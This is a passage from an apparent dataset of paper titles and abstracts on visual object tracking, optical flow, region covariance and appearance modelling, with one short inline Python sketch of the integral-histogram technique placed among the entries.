3.7 frames per second on a 3GHz machine. Experimental results have demonstrated that the algorithm is able to efficiently track articulated objects undergoing large variation in appearance and shape. --- paper_title: Finding Trajectories of Feature Points in a Monocular Image Sequence paper_content: Identifying the same physical point in more than one image, the correspondence problem, is vital in motion analysis. Most research for establishing correspondence uses only two frames of a sequence to solve this problem. By using a sequence of frames, it is possible to exploit the fact that due to inertia the motion of an object cannot change instantaneously. By using smoothness of motion, it is possible to solve the correspondence problem for arbitrary motion of several nonrigid objects in a scene. We formulate the correspondence problem as an optimization problem and propose an iterative algorithm to find trajectories of points in a monocular image sequence. A modified form of this algorithm is useful in case of occlusion also. We demonstrate the efficacy of this approach considering synthetic, laboratory, and real scenes. --- paper_title: Region Covariance : A Fast Descriptor for Detection and Classification paper_content: We describe a new region descriptor and apply it to two problems, object detection and texture classification. The covariance of d-features, e.g., the three-dimensional color vector, the norm of first and second derivatives of intensity with respect to x and y, etc., characterizes a region of interest. We describe a fast method for computation of covariances based on integral images. 
The idea presented here is more general than the image sums or histograms, which were already published before, and with a series of integral images the covariances are obtained by a few arithmetic operations. Covariance matrices do not lie on Euclidean space, therefore we use a distance metric involving generalized eigenvalues which also follows from the Lie group structure of positive definite matrices. Feature matching is a simple nearest neighbor search under the distance metric and performed extremely rapidly using the integral images. The performance of the covariance features is superior to other methods, as it is shown, and large rotations and illumination changes are also absorbed by the covariance matrix. --- paper_title: Covariance Tracking using Model Update Based on Lie Algebra paper_content: We propose a simple and elegant algorithm to track nonrigid objects using a covariance based object description and a Lie algebra based update mechanism. We represent an object window as the covariance matrix of features, therefore we manage to capture the spatial and statistical properties as well as their correlation within the same representation. The covariance matrix enables efficient fusion of different types of features and modalities, and its dimensionality is small. We incorporated a model update algorithm using the Lie group structure of the positive definite matrices. The update mechanism effectively adapts to the undergoing object deformations and appearance changes. The covariance tracking method does not make any assumption on the measurement noise and the motion of the tracked objects, and provides the global optimal solution. We show that it is capable of accurately detecting the nonrigid, moving objects in non-stationary camera sequences while achieving a promising detection rate of 97.4 percent. --- paper_title: Integrating Color and Shape-Texture Features for Adaptive Real-Time Object Tracking paper_content: We extend the standard mean-shift tracking algorithm to an adaptive tracker by selecting reliable features from color and shape-texture cues according to their descriptive ability. The target model is updated according to the similarity between the initial and current models, and this makes the tracker more robust. The proposed algorithm has been compared with other trackers using challenging image sequences, and it provides better performance. --- paper_title: Multi-frame optical flow estimation using subspace constraints paper_content: Shows that the set of all flow fields in a sequence of frames imaging a rigid scene resides in a low-dimensional linear subspace. Based on this observation, we develop a method for simultaneous estimation of optical flow across multiple frames, which uses these subspace constraints. The multi-frame subspace constraints are strong constraints, and they replace commonly used heuristic constraints, such as spatial or temporal smoothness. The subspace constraints are geometrically meaningful and are not violated at depth discontinuities or when the camera motion changes abruptly. Furthermore, we show that the subspace constraints on flow fields apply for a variety of imaging models, scene models and motion models. Hence, the presented approach for constrained multi-frame flow estimation is general. However, our approach does not require prior knowledge of the underlying world or camera model. 
Although linear subspace constraints have been used successfully in the past for recovering 3D information, it has been assumed that 2D correspondences are given. However, correspondence estimation is a fundamental problem in motion analysis. In this paper, we use multi-frame subspace constraints to constrain the 2D correspondence estimation process itself, and not for 3D recovery. --- paper_title: Feature point correspondence in the presence of occlusion paper_content: Occlusion and poor feature point detection are two of the main difficulties in the use of multiple frames for establishing correspondence of feature points. A formulation of the correspondence problem as an optimization problem is used to handle these difficulties. Modifications to an existing iterative optimization procedure for solving the formulation of the correspondence problem are discussed. Experimental results are presented to show the merits of the formulation. > --- paper_title: A Three Frame Algorithm for Estimating Two-Component Image Motion paper_content: A fundamental assumption made in formulating optical-flow algorithms, that motion at any point in an image can be represented as a single pattern component undergoing a simple translation, fails for a number of situations that commonly occur in real-world images. An alternative formulation of the local motion assumption in which there may be two distinct patterns undergoing coherent (e.g. affine) motion within a given local analysis region is proposed. An algorithm for the analysis of two-component motion in which tracking and nulling mechanisms applied to three consecutive image frames separate and estimate the individual components is given. Precise results are obtained, even for components that differ only slightly in velocity as well as for a faint component in the presence of a dominant, masking component. The algorithm provides precise motion estimates for a set of elementary two-motion configurations and is robust in the presence of noise. > --- paper_title: Integral histogram: a fast way to extract histograms in Cartesian spaces paper_content: We present a novel method, which we refer as an integral histogram, to compute the histograms of all possible target regions in a Cartesian data space. Our method has three distinct advantages: 1) It is computationally superior to the conventional approach. The integral histogram method makes it possible to employ even an exhaustive search process in real-time, which was impractical before. 2) It can be extended to higher data dimensions, uniform and nonuniform bin formations, and multiple target scales without sacrificing its computational advantages. 3) It enables the description of higher level histogram features. We exploit the spatial arrangement of data points, and recursively propagate an aggregated histogram by starting from the origin and traversing through the remaining points along either a scan-line or a wave-front. At each step, we update a single bin using the values of integral histogram at the previously visited neighboring data points. After the integral histogram is propagated, histogram of any target region can be computed easily by using simple arithmetic operations. 
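To make the integral-histogram mechanism summarized in the preceding entry concrete, the following is a minimal sketch, not the authors' implementation: it assumes a single-channel 8-bit image, a simple uniform quantization into `n_bins` bins, and uses function and variable names of our own choosing; the propagation is written as plain 2-D cumulative sums rather than the scan-line/wave-front schemes discussed in the paper.

```python
import numpy as np

def integral_histogram(image, n_bins=16):
    """ih[y, x, b] = number of pixels with bin index b inside image[:y, :x]."""
    bins = np.minimum(image.astype(np.int64) * n_bins // 256, n_bins - 1)
    h, w = bins.shape
    # One-hot encode each pixel's bin, then take cumulative sums along both axes.
    onehot = np.zeros((h, w, n_bins), dtype=np.int64)
    onehot[np.arange(h)[:, None], np.arange(w)[None, :], bins] = 1
    ih = np.zeros((h + 1, w + 1, n_bins), dtype=np.int64)
    ih[1:, 1:, :] = onehot.cumsum(axis=0).cumsum(axis=1)  # single propagation pass
    return ih

def region_histogram(ih, top, left, bottom, right):
    """Histogram of image[top:bottom, left:right] from four table lookups (inclusion-exclusion)."""
    return ih[bottom, right] - ih[top, right] - ih[bottom, left] + ih[top, left]

# Usage: one O(H * W * n_bins) pass, then any rectangle's histogram in O(n_bins).
img = (np.random.rand(120, 160) * 255).astype(np.uint8)
ih = integral_histogram(img)
hist = region_histogram(ih, 10, 20, 50, 80)
assert hist.sum() == (50 - 10) * (80 - 20)
```

After the single propagation pass, the histogram of any axis-aligned rectangle follows from four lookups and simple arithmetic, which is what makes exhaustive search over candidate regions affordable in the tracking applications cited in the surrounding entries.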
--- paper_title: Incremental learning of weighted tensor subspace for visual tracking paper_content: Tensor analysis has been widely utilized in image-related machine learning applications, which has preferable performance over the vector-based approaches for its capability of holding the spatial structure information in some research field. The traditional tensor representation only includes the intensity values, which is sensitive to illumination variation. For this purpose, a weighted tensor subspace (WTS) is defined as object descriptor by combining the Retinex image with the original image. Then, an incremental learning algorithm is developed for WTS to adapt to the appearance change during the tracking. The proposed method could learn the lightness changing incrementally and get robust tracking performance under various luminance conditions. The experimental results illustrate the effectiveness of the proposed visual tracking scheme. --- paper_title: Textural Features for Image Classification paper_content: Texture is one of the important characteristics used in identifying objects or regions of interest in an image, whether the image be a photomicrograph, an aerial photograph, or a satellite image. This paper describes some easily computable textural features based on gray-tone spatial dependencies, and illustrates their application in category-identification tasks of three different kinds of image data: photomicrographs of five kinds of sandstones, 1:20 000 panchromatic aerial photographs of eight land-use categories, and Earth Resources Technology Satellite (ERTS) multispectral imagery containing seven land-use categories. We use two kinds of decision rules: one for which the decision regions are convex polyhedra (a piecewise linear decision rule), and one for which the decision regions are rectangular parallelepipeds (a min-max decision rule). In each experiment the data set was divided into two parts, a training set and a test set. Test set identification accuracy is 89 percent for the photomicrographs, 82 percent for the aerial photographic imagery, and 83 percent for the satellite imagery. These results indicate that the easily computable textural features probably have a general applicability for a wide variety of image-classification applications. --- paper_title: Real-time Visual Tracking under Arbitrary Illumination Changes paper_content: In this paper, we investigate how to improve the robustness of visual tracking methods with respect to generic lighting changes. We propose a new approach to the direct image alignment of either Lambertian or non-Lambertian objects under shadows, inter-reflections, glints as well as ambient, diffuse and specular reflections which may vary in power, type, number and space. The method is based on a proposed model of illumination changes together with an appropriate geometric model of image motion. The parameters related to these models are obtained through an efficient second-order optimization technique which minimizes directly the intensity discrepancies. Comparison results with existing direct methods show significant improvements in the tracking performance. Extensive experiments confirm the robustness and reliability of our method. --- paper_title: GEOMETRIC MEANS IN A NOVEL VECTOR SPACE STRUCTURE ON SYMMETRIC POSITIVE-DEFINITE MATRICES paper_content: In this work we present a new generalization of the geometric mean of positive numbers on symmetric positive-definite matrices, called Log-Euclidean. 
The approach is based on two novel algebraic structures on symmetric positive-definite matrices: first, a Lie group structure which is compatible with the usual algebraic properties of this matrix space; second, a new scalar multiplication that smoothly extends the Lie group structure into a vector space structure. From bi-invariant metrics on the Lie group structure, we define the Log-Euclidean mean from a Riemannian point of view. This notion coincides with the usual Euclidean mean associated with the novel vector space structure. Furthermore, this mean corresponds to an arithmetic mean in the domain of matrix logarithms. We detail the invariance properties of this novel geometric mean and compare it to the recently introduced affine-invariant mean. The two means have the same determinant and are equal in a number of cases, yet they are not identical in general. --- paper_title: Visual tracking using learned linear subspaces paper_content: This paper presents a simple but robust visual tracking algorithm based on representing the appearances of objects using affine warps of learned linear subspaces of the image space. The tracker adaptively updates this subspace while tracking by finding a linear subspace that best approximates the observations made in the previous frames. Instead of the traditional L^2-reconstruction error norm which leads to subspace estimation using PCA or SVD, we argue that a variant of it, the uniform L^2-reconstruction error norm, is the right one for tracking. Under this framework we provide a simple and a computationally inexpensive algorithm for finding a subspace whose uniform L^2-reconstruction error norm for a given collection of data samples is below some threshold, and a simple tracking algorithm is an immediate consequence. We show experimental results on a variety of image sequences of people and man-made objects moving under challenging imaging conditions, which include drastic illumination variation, partial occlusion and extreme pose variation. --- paper_title: Dynamical statistical shape priors for level set-based tracking paper_content: In recent years, researchers have proposed introducing statistical shape knowledge into level set-based segmentation methods in order to cope with insufficient low-level information. While these priors were shown to drastically improve the segmentation of familiar objects, so far the focus has been on statistical shape priors which are static in time. Yet, in the context of tracking deformable objects, it is clear that certain silhouettes (such as those of a walking person) may become more or less likely over time. In this paper, we tackle the challenge of learning dynamical statistical models for implicitly represented shapes. We show how these can be integrated as dynamical shape priors in a Bayesian framework for level set-based image sequence segmentation. We assess the effect of such shape priors "with memory" on the tracking of familiar deformable objects in the presence of noise and occlusion. We show comparisons between dynamical and static shape priors, between models of pure deformation and joint models of deformation and transformation, and we quantitatively evaluate the segmentation accuracy as a function of the noise level and of the camera frame rate. 
Our experiments demonstrate that level set-based segmentation and tracking can be strongly improved by exploiting the temporal correlations among consecutive silhouettes which characterize deforming shapes --- paper_title: PROST: Parallel robust online simple tracking paper_content: Tracking-by-detection is increasingly popular in order to tackle the visual tracking problem. Existing adaptive methods suffer from the drifting problem, since they rely on self-updates of an on-line learning method. In contrast to previous work that tackled this problem by employing semi-supervised or multiple-instance learning, we show that augmenting an on-line learning method with complementary tracking approaches can lead to more stable results. In particular, we use a simple template model as a non-adaptive and thus stable component, a novel optical-flow-based mean-shift tracker as highly adaptive element and an on-line random forest as moderately adaptive appearance-based learner. We combine these three trackers in a cascade. All of our components run on GPUs or similar multi-core systems, which allows for real-time performance. We show the superiority of our system over current state-of-the-art tracking methods in several experiments on publicly available data. --- paper_title: Contextual flow paper_content: Matching based on local brightness is quite limited, because small changes on local appearance invalidate the constancy in brightness. The root of this limitation is its treatment regardless of the information from the spatial contexts. This papers leaps from brightness constancy to context constancy, and thus from optical flow to contextual flow. It presents a new approach that incorporates contexts to constrain motion estimation for target tracking. In this approach, one individual spatial context of a given pixel is represented by the posterior density of the associated feature class in its contextual domain. Each individual context gives a linear contextual flow constraint to the motion, so that the motion can be estimated in an over-determined contextual system. Based on this contextual flow model, this paper presents a new and powerful target tracking method that integrates the processes of salient contextual point selection, robust contextual matching, and dynamic context selection. Extensive experiment results show the effectiveness of the proposed approach. --- paper_title: Robust visual tracking based on simplified biologically inspired features paper_content: We address the problem of robust appearance-based visual tracking. First, a set of simplified biologically inspired features (SBIF) is proposed for object representation and the Bhattacharyya coefficient is used to measure the similarity between the target model and candidate targets. Then, the proposed appearance model is combined into a Bayesian state inference tracking framework utilizing the SIR (sampling importance resampling) particle filter to propagate sample distributions over time. Numerous experiments are conducted and experimental results demonstrate that our algorithm is robust to partial occlusions and variations of illumination and pose, resistent to nearby distractors, as well as possesses the state-of-the-art tracking accuracy. --- paper_title: Region covariance matrix-based object tracking with occlusions handling paper_content: This work proposes an optical-flow based feature tracking that is combined with region covariance matrix for dealing with tracking of an object undergoing considerable occlusions. 
The object is tracked using a set of key-points. The key-points are tracked via a computationally inexpensive optical flow algorithm. If the occlusion of the feature is detected the algorithm calculates the covariance matrix inside a region, which is located at the feature's position just before the occlusion. The region covariance matrix is then used to detect the ending of the feature occlusion. This is achieved via comparing the covariance matrix based similarity measures in some window surrounding the occluded key-point. The outliers that arise in the optical flow at the boundary of the objects are excluded using RANSAC and affine transformation. Experimental results that were obtained on freely available image sequences show the feasibility of our approach to perform tracking of objects undergoing considerable occlusions. The resulting algorithm can cope with occlusions of faces as well as objects of similar colors and shapes. --- paper_title: Determining Optical Flow paper_content: Optical flow cannot be computed locally, since only one independent measurement is available from the image sequence at a point, while the flow velocity has two components. A second constraint is needed. A method for finding the optical flow pattern is presented which assumes that the apparent velocity of the brightness pattern varies smoothly almost everywhere in the image. An iterative implementation is shown which successfully computes the optical flow for a number of synthetic image sequences. The algorithm is robust in that it can handle image sequences that are quantified rather coarsely in space and time. It is also insensitive to quantization of brightness levels and additive noise. Examples are included where the assumption of smoothness is violated at singular points or along lines in the image. --- paper_title: Differential Earth Mover's Distance with Its Applications to Visual Tracking paper_content: The Earth mover's distance (EMD) is a similarity measure that captures perceptual difference between two distributions. Its computational complexity, however, prevents a direct use in many applications. This paper proposes a novel differential EMD (DEMD) algorithm based on the sensitivity analysis of the simplex method and offers a speedup at orders of magnitude compared with its brute-force counterparts. The DEMD algorithm is discussed and empirically verified in the visual tracking context. The deformations of the distributions for objects at different time instances are accommodated well by the EMD, and the differential algorithm makes the use of EMD in real-time tracking possible. To further reduce the computation, signatures, i.e., variable-size descriptions of distributions, are employed as an object representation. The new algorithm models and estimates local background scenes as well as foreground objects to handle scale changes in a principled way. Extensive quantitative evaluation of the proposed algorithm has been carried out using benchmark sequences and the improvement over the standard mean shift tracker is demonstrated. --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. 
One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. --- paper_title: Robust Fragments-based Tracking using the Integral Histogram paper_content: We present a novel algorithm (which we call "Frag- Track") for tracking an object in a video sequence. The template object is represented by multiple image fragments or patches. The patches are arbitrary and are not based on an object model (in contrast with traditional use of modelbased parts e.g. limbs and torso in human tracking). Every patch votes on the possible positions and scales of the object in the current frame, by comparing its histogram with the corresponding image patch histogram. We then minimize a robust statistic in order to combine the vote maps of the multiple patches. A key tool enabling the application of our algorithm to tracking is the integral histogram data structure [18]. Its use allows to extract histograms of multiple rectangular regions in the image in a very efficient manner. Our algorithm overcomes several difficulties which cannot be handled by traditional histogram-based algorithms [8, 6]. First, by robustly combining multiple patch votes, we are able to handle partial occlusions or pose change. Second, the geometric relations between the template patches allow us to take into account the spatial distribution of the pixel intensities - information which is lost in traditional histogram-based algorithms. Third, as noted by [18], tracking large targets has the same computational cost as tracking small targets. We present extensive experimental results on challenging sequences, which demonstrate the robust tracking achieved by our algorithm (even with the use of only gray-scale (noncolor) information). --- paper_title: Single and Multiple Object Tracking Using Log-Euclidean Riemannian Subspace and Block-Division Appearance Model paper_content: Object appearance modeling is crucial for tracking objects, especially in videos captured by nonstationary cameras and for reasoning about occlusions between multiple moving objects. Based on the log-euclidean Riemannian metric on symmetric positive definite matrices, we propose an incremental log-euclidean Riemannian subspace learning algorithm in which covariance matrices of image features are mapped into a vector space with the log-euclidean Riemannian metric. 
Based on the subspace learning algorithm, we develop a log-euclidean block-division appearance model which captures both the global and local spatial layout information about object appearances. Single object tracking and multi-object tracking with occlusion reasoning are then achieved by particle filtering-based Bayesian state inference. During tracking, incremental updating of the log-euclidean block-division appearance model captures changes in object appearance. For multi-object tracking, the appearance models of the objects can be updated even in the presence of occlusions. Experimental results demonstrate that the proposed tracking algorithm obtains more accurate results than six state-of-the-art tracking algorithms. --- paper_title: Object tracking using the Gabor wavelet transform and the golden section algorithm paper_content: This paper presents a new method for tracking an object in a video sequence which uses a 2D Gabor wavelet transform (GWT), a 2D mesh, and a 2D golden section algorithm. An object is modeled by local features from a number of the selected feature points, and the global placement of these feature points. The feature points are stochastically selected based on the energy of their GWT coefficients. Points with higher energy have a higher probability of being selected. The amplitudes of the GWT coefficients of a feature point are then used as the local feature. The global placement of the feature points is determined by a 2D mesh whose feature is the area of the triangles formed by the feature points. The overall similarity between two objects is a weighted sum of the local and global similarities. In order to find the corresponding object in the video sequence, the 2D golden section algorithm is employed, and this can be shown to be the fastest algorithm to find the maximum of a unimodal function. Our results show that the method is robust to object deformation and supports object tracking in noisy video sequences. --- paper_title: Efficient Region Tracking With Parametric Models of Geometry and Illumination paper_content: As an object moves through the field of view of a camera, the images of the object may change dramatically. This is not simply due to the translation of the object across the image plane; complications arise due to the fact that the object undergoes changes in pose relative to the viewing camera, in illumination relative to light sources, and may even become partially or fully occluded. We develop an efficient general framework for object tracking, which addresses each of these complications. We first develop a computationally efficient method for handling the geometric distortions produced by changes in pose. We then combine geometry and illumination into an algorithm that tracks large image regions using no more computation than would be required to track with no accommodation for illumination changes. Finally, we augment these methods with techniques from robust statistics and treat occluded regions on the object as statistical outliers. Experimental results are given to demonstrate the effectiveness of our methods. --- paper_title: Detection and tracking of shopping groups in stores paper_content: We describe a monocular real-time computer vision system that identifies shopping groups by detecting and tracking multiple people as they wait in a checkout line or service counter. Our system segments each frame into foreground regions which contains multiple people. 
Foreground regions are further segmented into individuals using a temporal segmentation of foreground and motion cues. Once a person is detected, an appearance model based on color and edge density in conjunction with a mean-shift tracker is used to recover the person's trajectory. People are grouped together as a shopping group by analyzing interbody distances. The system also monitors the cashier's activities to determine when shopping transactions start and end. Experimental results demonstrate the robustness and real-time performance of the algorithm. --- paper_title: Object of Interest segmentation and Tracking by Using Feature Selection and Active Contours paper_content: Most image segmentation algorithms in the past are based on optimizing an objective function that aims to achieve the similarity between several low-level features to build a partition of the image into homogeneous regions. In the present paper, we propose to incorporate the relevance (selection) of the grouping features to enforce the segmentation toward the capturing of objects of interest. The relevance of the features is determined through a set of positive and negative examples of a specific object defined a priori by the user. The calculation of the relevance of the features is performed by maximizing an objective function defined on the mixture likelihoods of the positive and negative object examples sets. The incorporation of the features relevance in the object segmentation is formulated through an energy functional which is minimized by using level set active contours. We show the efficiency of the approach on several examples of object of interest segmentation and tracking where the features relevance is used. --- paper_title: On incremental and robust subspace learning paper_content: Principal Component Analysis (PCA) has been of great interest in computer vision and pattern recognition. In particular, incrementally learning a PCA model, which is computationally efficient for large-scale problems as well as adaptable to reflect the variable state of a dynamic system, is an attractive research topic with numerous applications such as adaptive background modelling and active object recognition. In addition, the conventional PCA, in the sense of least mean squared error minimisation, is susceptible to outlying measurements. To address these two important issues, we present a novel algorithm of incremental PCA, and then extend it to robust PCA. Compared with the previous studies on robust PCA, our algorithm is computationally more efficient. We demonstrate the performance of these algorithms with experimental results on dynamic background modelling and multi-view face modelling. --- paper_title: Incremental Tensor Subspace Learning and Its Applications to Foreground Segmentation and Tracking paper_content: Appearance modeling is very important for background modeling and object tracking. Subspace learning-based algorithms have been used to model the appearances of objects or scenes. Current vector subspace-based algorithms cannot effectively represent spatial correlations between pixel values. Current tensor subspace-based algorithms construct an offline representation of image ensembles, and current online tensor subspace learning algorithms cannot be applied to background modeling and object tracking. 
In this paper, we propose an online tensor subspace learning algorithm which models appearance changes by incrementally learning a tensor subspace representation through adaptively updating the sample mean and an eigenbasis for each unfolding matrix of the tensor. The proposed incremental tensor subspace learning algorithm is applied to foreground segmentation and object tracking for grayscale and color image sequences. The new background models capture the intrinsic spatiotemporal characteristics of scenes. The new tracking algorithm captures the appearance characteristics of an object during tracking and uses a particle filter to estimate the optimal object state. Experimental evaluations against state-of-the-art algorithms demonstrate the promise and effectiveness of the proposed incremental tensor subspace learning algorithm, and its applications to foreground segmentation and object tracking. --- paper_title: Gradient Feature Selection for Online Boosting paper_content: Boosting has been widely applied in computer vision, especially after Viola and Jones's seminal work. The marriage of rectangular features and integral-image- enabled fast computation makes boosting attractive for many vision applications. However, this popular way of applying boosting normally employs an exhaustive feature selection scheme from a very large hypothesis pool, which results in a less-efficient learning process. Furthermore, this poses additional constraint on applying boosting in an onine fashion, where feature re-selection is often necessary because of varying data characteristic, but yet impractical due to the huge hypothesis pool. This paper proposes a gradient-based feature selection approach. Assuming a generally trained feature set and labeled samples are given, our approach iteratively updates each feature using the gradient descent, by minimizing the weighted least square error between the estimated feature response and the true label. In addition, we integrate the gradient-based feature selection with an online boosting framework. This new online boosting algorithm not only provides an efficient way of updating the discriminative feature set, but also presents a unified objective for both feature selection and weak classifier updating. Experiments on the person detection and tracking applications demonstrate the effectiveness of our proposal. --- paper_title: Boosting adaptive linear weak classifiers for online learning and tracking paper_content: Online boosting methods have recently been used successfully for tracking, background subtraction etc. Conventional online boosting algorithms emphasize on interchanging new weak classifiers/features to adapt with the change over time. We are proposing a new online boosting algorithm where the form of the weak classifiers themselves are modified to cope with scene changes. Instead of replacement, the parameters of the weak classifiers are altered in accordance with the new data subset presented to the online boosting process at each time step. Thus we may avoid altogether the issue of how many weak classifiers to be replaced to capture the change in the data or which efficient search algorithm to use for a fast retrieval of weak classifiers. A computationally efficient method has been used in this paper for the adaptation of linear weak classifiers. The proposed algorithm has been implemented to be used both as an online learning and a tracking method. 
We show quantitative and qualitative results on both UCI datasets and several video sequences to demonstrate improved performance of our algorithm. --- paper_title: Tracking as Repeated Figure/Ground Segmentation paper_content: Tracking over a long period of time is challenging as the appearance, shape and scale of the object in question may vary. We propose a paradigm of tracking by repeatedly segmenting figure from background. Accurate spatial support obtained in segmentation provides rich information about the track and enables reliable tracking of non-rigid objects without drifting. Figure/ground segmentation operates sequentially in each frame by utilizing both static image cues and temporal coherence cues, which include an appearance model of brightness (or color) and a spatial model propagating figure/ground masks through low-level region correspondence. A superpixel-based conditional random field linearly combines cues and loopy belief propagation is used to estimate marginal posteriors of figure vs background. We demonstrate our approach on long sequences of sports video, including figure skating and football. --- paper_title: Surf: Speeded up robust features paper_content: In this paper, we present a novel scale- and rotation-invariant interest point detector and descriptor, coined SURF (Speeded Up Robust Features). It approximates or even outperforms previously proposed schemes with respect to repeatability, distinctiveness, and robustness, yet can be computed and compared much faster. ::: ::: This is achieved by relying on integral images for image convolutions; by building on the strengths of the leading existing detectors and descriptors (in casu, using a Hessian matrix-based measure for the detector, and a distribution-based descriptor); and by simplifying these methods to the essential. This leads to a combination of novel detection, description, and matching steps. The paper presents experimental results on a standard evaluation set, as well as on imagery obtained in the context of a real-life object recognition application. Both show SURF's strong performance. --- paper_title: Incremental focus of attention for robust visual tracking paper_content: We present the Incremental Focus of Attention (IFA) architecture for adding robustness to software-based, real-time, motion trackers. The framework provides a structure which, when given the entire camera image to search, efficiently focuses the attention of the system into a narrow set of possible slates that includes the target state. IFA offers a means for automatic tracking initialization and reinitialization when environmental conditions momentarily deteriorate and cause the system to lose track of its target. Systems based on the framework degrade gracefully as various assumptions about the environment are violated. In particular, multiple tracking algorithms are layered so that the failure of a single algorithm causes another algorithm of less precision to take over, thereby allowing the system to return approximate feature state information. --- paper_title: Histograms of oriented gradients for human detection paper_content: We study the question of feature sets for robust visual object recognition; adopting linear SVM based human detection as a test case. After reviewing existing edge and gradient based descriptors, we show experimentally that grids of histograms of oriented gradient (HOG) descriptors significantly outperform existing feature sets for human detection. 
We study the influence of each stage of the computation on performance, concluding that fine-scale gradients, fine orientation binning, relatively coarse spatial binning, and high-quality local contrast normalization in overlapping descriptor blocks are all important for good results. The new approach gives near-perfect separation on the original MIT pedestrian database, so we introduce a more challenging dataset containing over 1800 annotated human images with a large range of pose variations and backgrounds. --- paper_title: SURF Tracking paper_content: Most motion-based tracking algorithms assume that objects undergo rigid motion, which is most likely disobeyed in real world. In this paper, we present a novel motion-based tracking framework which makes no such assumptions. Object is represented by a set of local invariant features, whose motions are observed by a feature correspondence process. A generative model is proposed to depict the relationship between local feature motions and object global motion, whose parameters are learned efficiently by an on-line EM algorithm. And the object global motion is estimated in term of maximum likelihood of observations. Then an updating mechanism is employed to adapt object representation. Experiments show that our framework is flexible and robust in dealing with appearance changes, background clutter, illumination changes and occlusion. --- paper_title: Human tracking by multiple kernel boosting with locality affinity constraints paper_content: In this paper, we incorporate the concept of Multiple Kernel Learning (MKL) algorithm, which is used in object categorization, into human tracking field. For efficiency, we devise an algorithm called Multiple Kernel Boosting (MKB), instead of directly adopting MKL. MKB aims to find an optimal combination of many single kernel SVMs focusing on different features and kernels by boosting technique. Besides, we apply Locality Affinity Constraints (LAC) to each selected SVM. LAC is computed from the distribution of support vectors of respective SVM, recording the underlying locality of training data. An update scheme to reselect good SVMs, adjust their weights and recalculate LAC is also included. Experiments on standard and our own testing sequences show that our MKB tracking outperforms some other state-of-the-art algorithms in handling various conditions. --- paper_title: Probabilistic Object Tracking With Dynamic Attributed Relational Feature Graph paper_content: Object tracking is one of the fundamental problems in computer vision and has received considerable attention in the past two decades. The success of a tracking algorithm relies on two key issues: 1) an effective representation so that the object being tracked can be distinguished from the background and other objects and 2) an update scheme of the object representation to accommodate object appearance and structure changes. Despite the progress made in the past, reliable and efficient tracking of objects with changing appearance remains a challenging problem. In this paper, a novel sparse, local feature-based object representation, the attributed relational feature graph, is proposed to solve this problem. The object is modeled using invariant features such as the scale-invariant feature transform and the geometric relations among features are encoded in the form of a graph. 
A dynamic model is developed to evolve the feature graph according to the appearance and structure changes by adding new stable features as well as removing inactive features. Extensive experiments show that our method can achieve reliable tracking even under significant appearance changes, view point changes, and occlusion. --- paper_title: Efficient Maximally Stable Extremal Region (MSER) Tracking paper_content: This paper introduces a tracking method for the well known local MSER (Maximally Stable Extremal Region) detector. The component tree is used as an efficient data structure, which allows the calculation of MSERs in quasi-linear time. It is demonstrated that the tree is able to manage the required data for tracking. We show that by means of MSER tracking the computational time for the detection of single MSERs can be improved by a factor of 4 to 10. Using a weighted feature vector for data association improves the tracking stability. Furthermore, the component tree enables backward tracking which further improves the robustness. The novel MSER tracking algorithm is evaluated on a variety of scenes. In addition, we demonstrate three different applications, tracking of license plates, faces and fibers in paper, showing in all three scenarios improved speed and stability. --- paper_title: Object Level Grouping for Video Shots paper_content: We describe a method for automatically obtaining object representations suitable for retrieval from generic video shots. The object representation consists of an association of frame regions. These regions provide exemplars of the object’s possible visual appearances.Two ideas are developed: (i) associating regions within a single shot to represent a deforming object; (ii) associating regions from the multiple visual aspects of a 3D object, thereby implicitly representing 3D structure. For the association we exploit temporal continuity (tracking) and wide baseline matching of affine covariant regions.In the implementation there are three areas of novelty: First, we describe a method to repair short gaps in tracks. Second, we show how to join tracks across occlusions (where many tracks terminate simultaneously). Third, we develop an affine factorization method that copes with motion degeneracy.We obtain tracks that last throughout the shot, without requiring a 3D reconstruction. The factorization method is used to associate tracks into object-level groups, with common motion. The outcome is that separate parts of an object that are not simultaneously visible (such as the front and back of a car, or the front and side of a face) are associated together. In turn this enables object-level matching and recognition throughout a video.We illustrate the method on the feature film “Groundhog Day.” Examples are given for the retrieval of deforming objects (heads, walking people) and rigid objects (vehicles, locations). --- paper_title: Tracking aspects of the foreground against the background paper_content: In object tracking, change of object aspect is a cause of failure due to significant changes of object appearances. The paper proposes an approach to this problem without a priori learning object views. The object identification relies on a discriminative model using both object and background appearances. The background is represented as a set of texture patterns. The tracking algorithm then maintains a set of discriminant functions each recognizing a pattern in the object region against the background patterns that are currently relevant. 
Object matching is then performed efficiently by maximization of the sum of the discriminant functions over all object patterns. As a result, the tracker searches for the region that matches the target object and it also avoids background patterns seen before. The results of the experiment show that the proposed tracker is robust to even severe aspect changes when unseen views of the object come into view. --- paper_title: Guided Search 2.0: A revised model of visual search paper_content: An important component of routine visual behavior is the ability to find one item in a visual world filled with other, distracting items. This ability to perform visual search has been the subject of a large body of research in the past 15 years. This paper reviews the visual search literature and presents a model of human search behavior. Built upon the work of Neisser, Treisman, Julesz, and others, the model distinguishes between a preattentive, massively parallel stage that processes information about basic visual features (color, motion, various depth cues, etc.) across large portions of the visual field and a subsequent limited-capacity stage that performs other, more complex operations (e.g., face recognition, reading, object identification) over a limited portion of the visual field. The spatial deployment of the limited-capacity process is under attentional control. The heart of the guided search model is the idea that attentional deployment of limited resources is guided by the output of the earlier parallel processes. Guided Search 2.0 (GS2) is a revision of the model in which virtually all aspects of the model have been made more explicit and/or revised in light of new data. The paper is organized into four parts: Part 1 presents the model and the details of its computer simulation. Part 2 reviews the visual search literature on preattentive processing of basic features and shows how the GS2 simulation reproduces those results. Part 3 reviews the literature on the attentional deployment of limited-capacity processes in conjunction and serial searches and shows how the simulation handles those conditions. Finally, Part 4 deals with shortcomings of the model and unresolved issues. --- paper_title: Saliency-based discriminant tracking paper_content: We propose a biologically inspired framework for 